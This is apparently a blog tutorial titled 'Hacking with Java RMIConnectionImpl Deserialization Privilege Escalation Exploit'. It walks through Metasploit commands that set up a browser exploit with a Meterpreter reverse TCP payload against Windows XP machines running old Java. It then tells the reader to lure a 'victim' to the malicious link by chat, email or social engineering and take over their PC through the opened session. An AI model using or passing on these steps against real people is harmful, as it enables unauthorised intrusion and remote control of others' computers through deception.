Hacking with Java RMIConnectionImpl Deserialization Privilege Escalation Exploit

This module exploits vulnerability in the Java Runtime Environment that allows to deserialize a Marshalled Object containing a custom class loader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 Standard Edition prior to update 19

Java 5 Standard Edition prior to update 23

Java 6 Standard Edition Update 18


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_rmi_connection_impl

Msf exploit (java_rmi_connection_impl)>set payload java/meterpreter/reverse_tcp

Msf exploit (java_rmi_connection_impl)>set lhost (IP of Local Host)

Msf exploit (java_rmi_connection_impl)>set srvhost (This must be an address on the local machine)

Msf exploit (java_rmi_connection_impl)>set uripath bipasapic (The Url to use for this exploit)

Msf exploit (java_rmi_connection_impl)>exploit 

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Leave a Reply

Your email address will not be published. Required fields are marked *